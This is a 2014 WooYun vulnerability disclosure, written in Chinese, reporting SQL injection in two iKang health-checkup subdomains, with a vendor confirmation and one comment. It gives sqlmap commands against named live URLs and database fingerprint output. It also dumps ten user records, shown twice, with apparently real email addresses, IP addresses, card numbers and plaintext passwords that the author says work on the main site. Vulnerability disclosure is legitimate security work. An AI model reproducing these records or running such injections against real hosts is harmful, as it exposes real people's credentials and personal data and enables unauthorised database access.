当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074210

漏洞标题:爱康国宾另两处注入50万主站用户信息存泄露风险

相关厂商:爱康国宾

漏洞作者: 花花酱

提交时间:2014-08-28 15:46

修复时间:2014-10-12 15:48

公开时间:2014-10-12 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-28: 细节已通知厂商并且等待厂商处理中
2014-08-29: 厂商已经确认,细节仅向厂商公开
2014-09-08: 细节向核心白帽子及相关领域专家公开
2014-09-18: 细节向普通白帽子公开
2014-09-28: 细节向实习白帽子公开
2014-10-12: 细节向公众公开

简要描述:

你懂的,不要明文存储嘛。

详细说明:

不要明文存密码嘛~~~~
爱康有多个地方分站的子域名。有些子域名有做防注入处理,有没有没有。不知道为啥。。。。。
又发现两个存在注入的分站:

sqlmap.py -u "http://xzm.ikang.com/news_article.php?id=1" --random-agent --dbs
sqlmap.py -u "http://cdhzb.ikang.com/news_article.php?id=1" --random-agent


目测很多分站以及其他应用使用了同一个数据库。这个注入点同样可以有33个库的权限。以web库为例。应该是主站的数据库。50万注册用户的信息明文存储,包括密码。

[13:41:56] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
[13:41:56] [INFO] resumed: 529604
Database: web
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 529604  |
+--------+---------+
[13:41:56] [INFO] fetched data logged to text files under '/home/litdg/workspace/sqlmap/output/cqhnb.ikang.com'


测试密码可登陆主站。

web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
Database: web
Table: user
[10 entries]
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| id | cardid           | corpid | memberid | ip              | city    | type    | title   | email                   | status | content | nickname                       | keywords | password  |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| 1  | 7000000000000001 | 2383   | 300535   | 60.194.121.93   | <blank> | <blank> | <blank> | raymond.du@ikang.com    | 1      | <blank> | Raymond                        | <blank>  | soso      |
| 2  | 0021000000157444 | 206    | NULL     | 61.129.127.226  | <blank> | <blank> | <blank> | roquel@163.com          | 0      | <blank> | RoqueL                         | <blank>  | anichr    |
| 3  | 1111000000012757 | 2383   | NULL     | 124.203.150.151 | <blank> | <blank> | <blank> | lm_irena@sina.com       | 0      | <blank> | lm_irena                       | <blank>  | 596621    |
| 4  | NULL             | NULL   | NULL     | 222.35.170.153  | <blank> | <blank> | <blank> | judy@ikang.com          | 0      | <blank> | Judy                           | <blank>  | anichr    |
| 5  | 1111000000016090 | 2383   | NULL     | 218.23.34.152   | <blank> | <blank> | <blank> | mayimin@ah163.com       | 0      | <blank> | mayimin                        | <blank>  | 550223    |
| 6  | NULL             | NULL   | NULL     | 219.142.174.152 | <blank> | <blank> | <blank> | nuo.zha@ikang.com       | 0      | <blank> | Divine                         | <blank>  | 123456    |
| 7  | 7000000000000003 | 2383   | NULL     | 61.51.225.93    | <blank> | <blank> | <blank> | motuo12345@yahoo.com.cn | 0      | <blank> | motuo12345                     | <blank>  | 453392123 |
| 8  | NULL             | NULL   | NULL     | NULL            | <blank> | <blank> | <blank> | yaolan01@126.com        | 0      | <blank> | 412545                         | <blank>  | ikang1371 |
| 9  | 1111000000016999 | 2383   | NULL     | 218.19.161.78   | <blank> | <blank> | <blank> | kong168@163.com         | 0      | <blank> | kong168168                     | <blank>  | 65124104  |
| 10 | 7000000000000004 | 2383   | NULL     | 222.130.86.172  | <blank> | <blank> | <blank> | yaolan01@126.com        | 0      | <blank> | \\?d2\\?a6\\?bd\\?f0\\?c0\\?bc | <blank>  | ikang1371 |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+


漏洞证明:

web server operating system: Linux CentOS 4.9
web application technology: PHP 4.4.2, Apache 2.0.52
back-end DBMS: MySQL 5.0.11
Database: web
Table: user
[10 entries]
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| id | cardid           | corpid | memberid | ip              | city    | type    | title   | email                   | status | content | nickname                       | keywords | password  |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+
| 1  | 7000000000000001 | 2383   | 300535   | 60.194.121.93   | <blank> | <blank> | <blank> | raymond.du@ikang.com    | 1      | <blank> | Raymond                        | <blank>  | soso      |
| 2  | 0021000000157444 | 206    | NULL     | 61.129.127.226  | <blank> | <blank> | <blank> | roquel@163.com          | 0      | <blank> | RoqueL                         | <blank>  | anichr    |
| 3  | 1111000000012757 | 2383   | NULL     | 124.203.150.151 | <blank> | <blank> | <blank> | lm_irena@sina.com       | 0      | <blank> | lm_irena                       | <blank>  | 596621    |
| 4  | NULL             | NULL   | NULL     | 222.35.170.153  | <blank> | <blank> | <blank> | judy@ikang.com          | 0      | <blank> | Judy                           | <blank>  | anichr    |
| 5  | 1111000000016090 | 2383   | NULL     | 218.23.34.152   | <blank> | <blank> | <blank> | mayimin@ah163.com       | 0      | <blank> | mayimin                        | <blank>  | 550223    |
| 6  | NULL             | NULL   | NULL     | 219.142.174.152 | <blank> | <blank> | <blank> | nuo.zha@ikang.com       | 0      | <blank> | Divine                         | <blank>  | 123456    |
| 7  | 7000000000000003 | 2383   | NULL     | 61.51.225.93    | <blank> | <blank> | <blank> | motuo12345@yahoo.com.cn | 0      | <blank> | motuo12345                     | <blank>  | 453392123 |
| 8  | NULL             | NULL   | NULL     | NULL            | <blank> | <blank> | <blank> | yaolan01@126.com        | 0      | <blank> | 412545                         | <blank>  | ikang1371 |
| 9  | 1111000000016999 | 2383   | NULL     | 218.19.161.78   | <blank> | <blank> | <blank> | kong168@163.com         | 0      | <blank> | kong168168                     | <blank>  | 65124104  |
| 10 | 7000000000000004 | 2383   | NULL     | 222.130.86.172  | <blank> | <blank> | <blank> | yaolan01@126.com        | 0      | <blank> | \\?d2\\?a6\\?bd\\?f0\\?c0\\?bc | <blank>  | ikang1371 |
+----+------------------+--------+----------+-----------------+---------+---------+---------+-------------------------+--------+---------+--------------------------------+----------+-----------+

修复方案:

版权声明:转载请注明来源 花花酱@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-08-29 14:44

厂商回复:

漏洞确认,我们立即修复,谢谢!

最新状态:

暂无

漏洞评价:

评论

  1. 2014-08-29 18:54 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @爱康国宾 上周去你们那体检,被吓到做了全套的体检!!!http://weibo.com/1859213130/BiPajeabp?mod=weibotime ,你们要不要也考虑在乌云众测上一期项目,好让我把被坑的体检费赚回来呀?